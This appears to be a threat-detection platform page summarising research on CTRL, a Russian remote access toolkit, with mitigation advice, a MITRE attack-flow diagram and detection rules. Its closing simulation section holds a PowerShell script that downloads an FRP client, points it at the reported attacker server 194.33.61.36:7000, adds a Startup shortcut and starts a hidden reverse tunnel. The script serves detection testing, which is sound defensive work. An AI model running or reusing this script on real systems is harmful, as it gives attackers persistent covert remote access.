Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Censys ARC uncovered a previously undocumented Russian remote access toolkit named CTRL that blends credential phishing, keylogging, RDP hijacking, and FRP-based reverse tunnels. The framework is delivered through a malicious LNK file and hides its binaries inside the Windows registry, where they are later loaded directly into memory. Its network infrastructure includes the domain hui228.ru and two IP addresses operating an FRP server on port 7000. The toolkit targets Windows hosts and maintains persistence through scheduled tasks, hidden local user accounts, and registry-based changes.
Investigation
Researchers identified the LNK dropper, rebuilt the layered PowerShell loader, and traced staged .NET binaries stored as REG_BINARY values beneath Explorer registry keys. The stager then downloads follow-on payloads, creates a concealed ctrl.exe loader, configures FRP tunnels, and deploys RDP Wrapper to allow unrestricted remote sessions. None of the observed artifacts appeared in public threat intelligence feeds, suggesting the framework is a private and purpose-built access platform.
Mitigation
Defenders should watch for unusual registry writes under Explorer keys, creation of scheduled tasks named DriverSvcTask, NetTcpSvc, TermSvcHost, or WindowsHealthMonitor, and hidden local accounts added to the Administrators or Remote Desktop Users groups. Outbound connections to the identified IP addresses and FRP port 7000 should be blocked, and FRP protocol traffic on unexpected systems should be flagged. Unauthorized FRP or RDP Wrapper installations should be removed, and PowerShell execution should be tightly controlled.
Response
If CTRL-related activity is found, isolate the endpoint, acquire the LNK file and relevant registry hive for forensic analysis, stop the ctrl.exe process, and remove the associated scheduled tasks. Any newly created local accounts should be disabled, unauthorized RDP permissions revoked, and exposed credentials rotated. Teams should then scan the wider environment for additional FRP servers and update detection rules with the observed IOCs.
"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffeb99 classDef file fill:#dddddd %% Nodes u2013 Actions (MITRE Techniques) action_user_exec["<b>Action</b> – <b>T1204.002 User Execution</b>: Victim clicks malicious .lnk shortcut"] class action_user_exec action action_lnk_smuggle["<b>Action</b> – <b>T1027.012 LNK Icon Smuggling</b>: Shortcut disguises itself with a folder icon"] class action_lnk_smuggle action action_powershell["<b>Action</b> – <b>T1059.001 PowerShell</b>: Hidden PowerShell command decodes payload"] class action_powershell action action_deobfuscate["<b>Action</b> – <b>T1140 Deobfuscate/Decode Files</b>: Multiple Base64 and Deflate stages"] class action_deobfuscate action action_obfuscation["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b>: Randomized variable names and runtime string construction"] class action_obfuscation action action_shortcut_persistence["<b>Action</b> – <b>T1547.009 Shortcut Modification</b>: LNK serves as persistence mechanism"] class action_shortcut_persistence action action_scheduled_tasks["<b>Action</b> – <b>T1053 Scheduled Task/Job</b>: Four tasks created to run binaries at startup"] class action_scheduled_tasks action action_create_account["<b>Action</b> – <b>T1136.001 Create Account</b>: Hidden local administrator account added"] class action_create_account action action_uac_bypass["<b>Action</b> – <b>T1548 Abuse Elevation Control Mechanism</b>: fodhelper.exe registry hijack bypasses UAC"] class action_uac_bypass action action_proxy_execution["<b>Action</b> – <b>T1218 System Binary Proxy Execution</b>: wlrmdr.exe used to execute payload with elevated rights"] class action_proxy_execution action action_priv_esc["<b>Action</b> – <b>T1068 Exploitation for Privilege Escalation</b>: patches termsrv.dll and installs RDP Wrapper"] class action_priv_esc action action_masquerade["<b>Action</b> – <b>T1036 Masquerading</b>: Files placed in hidden directories with legitimateu2011looking names"] class action_masquerade action action_hide_artifacts["<b>Action</b> – <b>T1564 Hide Artifacts</b>: Defender exclusions, timestamp falsification, registry mimicry"] class action_hide_artifacts action action_keylogging["<b>Action</b> – <b>T1056.001 Input Capture u2013 Keylogging</b>: Lowu2011level keyboard hook writes to C:\Temp\keylog.txt"] class action_keylogging action action_cred_harvest["<b>Action</b> – Credential Harvesting: Custom WPF Windows Hello UI captures PINs"] class action_cred_harvest action action_rdp["<b>Action</b> – <b>T1021.001 Remote Services u2013 RDP</b>: RDP Wrapper enables remote desktop access"] class action_rdp action action_rdp_hijack["<b>Action</b> – <b>T1563.002 Remote Service Session Hijacking</b>: Attacker shadows active sessions via mstsc /shadow"] class action_rdp_hijack action action_frp_proxy["<b>Action</b> – <b>T1090.002 Proxy u2013 External Proxy</b>: FRP tunnel to hui228.ru:7000 acts as external proxy"] class action_frp_proxy action action_encrypted_channel["<b>Action</b> – <b>T1573 Encrypted Channel</b>: FRP traffic encrypted, AESu2011256u2011CBC payload decryption"] class action_encrypted_channel action action_valid_accounts["<b>Action</b> – <b>T1078.003 Valid Accounts u2013 Local Accounts</b>: Hidden admin account used for persistence and lateral movement"] class action_valid_accounts action action_lateral_movement["<b>Action</b> – Lateral Movement: Use of valid local admin accounts to spread within the network"] class action_lateral_movement action %% Nodes u2013 Tools / Files / Processes tool_lnk["<b>Tool</b> – Weaponized .lnk Shortcut<br/><b>File</b>: kfxm7p9q_yek.lnk"] class tool_lnk tool tool_powershell["<b>Tool</b> – PowerShell<br/><b>Purpose</b>: Execute hidden script that decodes and decompresses .NET stager"] class tool_powershell tool process_stager["<b>Process</b> – .NET Stager stored as REG_BINARY under HKCU\…\Explorer"] class process_stager process tool_fodhelper["<b>Tool</b> – fodhelper.exe (Windows Utility)"] class tool_fodhelper tool tool_wlrmdr["<b>Tool</b> – wlrmdr.exe (signed Microsoft binary)"] class tool_wlrmdr tool tool_rdpwrapper["<b>Tool</b> – RDP Wrapper<br/><b>Function</b>: Enables unlimited concurrent RDP sessions"] class tool_rdpwrapper tool tool_frp["<b>Tool</b> – FRP client<br/><b>Function</b>: Reverse tunnel to external server"] class tool_frp tool keylog_file["<b>File</b> – C:\Temp\keylog.txt<br/><b>Content</b>: Captured keystrokes"] class keylog_file file %% Connections u2013 Attack Flow action_user_exec –>|launches| tool_lnk tool_lnk –>|triggers| action_lnk_smuggle action_lnk_smuggle –>|leads to| action_powershell action_powershell –>|executes| tool_powershell tool_powershell –>|stores payload in| process_stager process_stager –>|decoded by| action_deobfuscate action_deobfuscate –>|enables| action_obfuscation action_obfuscation –>|supports| action_shortcut_persistence action_shortcut_persistence –>|creates| action_scheduled_tasks action_scheduled_tasks –>|creates| action_create_account action_create_account –>|facilitates| action_uac_bypass action_uac_bypass –>|uses| tool_fodhelper action_uac_bypass –>|uses| tool_wlrmdr action_uac_bypass –>|enables| action_proxy_execution action_proxy_execution –>|facilitates| action_priv_esc action_priv_esc –>|installs| tool_rdpwrapper action_priv_esc –>|enables| action_masquerade action_masquerade –>|leads to| action_hide_artifacts action_hide_artifacts –>|adds| action_keylogging action_keylogging –>|writes to| keylog_file action_keylogging –>|supports| action_cred_harvest action_cred_harvest –>|enables| action_rdp action_rdp –>|used for| action_rdp_hijack action_rdp_hijack –>|sets up| action_frp_proxy action_frp_proxy –>|provides| action_encrypted_channel action_encrypted_channel –>|allows| action_valid_accounts action_valid_accounts –>|used for| action_lateral_movement %% Styling Assignments class tool_lnk,tool_powershell,tool_fodhelper,tool_wlrmdr,tool_rdpwrapper,tool_frp tool class process_stager process class keylog_file file "
Attack Flow
Detections
Possible Remote Desktop Services Shadowing (via registry_event)
View
Suspicious Powershell Strings (via powershell)
View
Suspicious Powershell Strings (via cmdline)
View
Windows Defender Preferences Suspicious Changes (via powershell)
View
Privilege escalation (UAC bypass) in FodHelper (via registry_event)
View
IOCs (HashSha256) to detect: Under CTRL: Dissecting a Previously Undocumented Russian .Net Access Framework
View
IOCs (DestinationIP) to detect: Under CTRL: Dissecting a Previously Undocumented Russian .Net Access Framework
View
IOCs (Emails) to detect: Under CTRL: Dissecting a Previously Undocumented Russian .Net Access Framework
View
IOCs (SourceIP) to detect: Under CTRL: Dissecting a Previously Undocumented Russian .Net Access Framework
View
Detect Malicious FRP Reverse Tunneling Connections [Windows Network Connection]
View
Detect CTRL Toolkit Persistence via Explorer Registry Keys [Windows Registry Event]
View
Detect Obfuscated PowerShell Execution with Encoded Payload [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
-
Attack Narrative & Commands:
An adversary has already dropped the FRP client (frp.exe) onto the compromised Windows host via a malicious phishing attachment. To maintain persistence, the attacker registers a shortcut in the Startup folder that launches FRP with a configuration pointing to the C2 server194.33.61.36:7000. When the user logs on, the shortcut starts FRP, which opens a reverse TCP tunnel back to the attacker, allowing the attacker to forward any local service (e.g., SMB) through the tunnel. The network‑connection generated by FRP matches the rule’sdst_ipanddst_portcriteria, causing an alert. -
Regression Test Script: (PowerShell – self‑contained)
# ============================================================================= # FRP Reverse Tunnel Simulation – triggers Sigma rule fcb13968-1490-44c2-9f9f-c1ad2b668ce6 # ============================================================================= # Variables $frpUrl = "https://example.com/frp.exe" # replace with a reachable test binary $frpPath = "$env:ProgramDatafrp.exe" $cfgPath = "$env:ProgramDatafrp_client.ini" $c2Ip = "194.33.61.36" $c2Port = "7000" $startupLnk = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupFRP.lnk" # 1. Download FRP binary (simulated – use any small executable for test) Invoke-WebRequest -Uri $frpUrl -OutFile $frpPath -UseBasicParsing # 2. Create minimal FRP client config @" [common] server_addr = $c2Ip server_port = $c2Port [ssh] type = tcp local_port = 22 remote_port = 6000 "@ | Set-Content -Path $cfgPath -Encoding ASCII # 3. Create a shortcut in the Startup folder to run FRP on boot $ws = New-Object -ComObject WScript.Shell $shortcut = $ws.CreateShortcut($startupLnk) $shortcut.TargetPath = $frpPath $shortcut.Arguments = "-c `"$cfgPath`"" $shortcut.WorkingDirectory = Split-Path $frpPath $shortcut.Save() # 4. Launch FRP now (so we can see the telemetry immediately) Start-Process -FilePath $frpPath -ArgumentList "-c `"$cfgPath`"" -WindowStyle Hidden Write-Host "FRP reverse tunnel launched. Check SIEM for detection." -
Cleanup Commands:
# Stop FRP process Get-Process -Name frp -ErrorAction SilentlyContinue | Stop-Process -Force # Remove files and shortcut Remove-Item -Path "$env:ProgramDatafrp.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:ProgramDatafrp_client.ini" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupFRP.lnk" -Force -ErrorAction SilentlyContinue Write-Host "Cleanup completed."